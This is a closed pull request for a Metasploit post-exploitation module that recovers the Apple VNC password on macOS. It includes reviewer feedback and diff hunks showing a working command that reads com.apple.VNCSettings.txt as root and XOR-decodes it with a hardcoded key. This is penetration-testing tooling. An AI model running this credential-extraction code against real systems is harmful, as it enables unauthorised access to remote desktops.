### PR TITLE
Display Apple VNC Password (OSX)

### PR DESCRIPTION
**Pull request by interhack86**
This module show Apple VNC Password from Mac OS X High Sierra.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a `shell` or `meterpreter` session on some host.
- [ ] `use osx/gather/vnc_password_osx`
- [ ] ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
- [ ] `run`
- [ ] **Verify** If the system has a VNC file, the VNC password will be obtained.
- [ ] **Verify** If you do not have the file, or you are not root, you will not get the password

### CODE REVIEW

**Comment by interhack86** [comment]
This module show Apple VNC Password from Mac OS X High Sierra.

**Comment by jrobles-r7** [comment]
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

File: modules/post/osx/gather/vnc_password_osx.rb [hunk 1]
```diff
@@ -0,0 +1,48 @@
...
+    when /shell/
+      host = cmd_exec("hostname")
+    end
+
+    print_status("Running module against #{host}")
+
+    if is_root?
+      print_status("This session is running as root!")
+      print_status("Checking VNC Password...")
+      exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;")
```
Comment (bcoles) [inline modules/post/osx/gather/vnc_password_osx.rb]: If you include `include Msf::Post::File`, you should be able to use `file_exist?`

```ruby
    unless is_root?
      fail_with(Failure::NoAccess, 'It is necessary to be root!')
    end
    print_status("This session is running as root!")

    print_status("Checking VNC Password...")
    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
    if file_exist? vncsettings_path
      password = cmd_exec("sudo cat #{vncsettings_path} | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'")
      print_good("Password Found: #{password}")
    else
      print_error("The VNC Password has not been found")
    end
```

File: modules/post/osx/gather/vnc_password_osx.rb [hunk 2]
```diff
@@ -0,0 +1,48 @@
...
+      if exist == '1'
+        print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'"))
```
Comment (bcoles) [inline modules/post/osx/gather/vnc_password_osx.rb]: Is `perl` likely to be present?

Returning the raw data to Metasploit, then parsing it locally with Ruby, might be more reliable.

**Pull request closed without merging**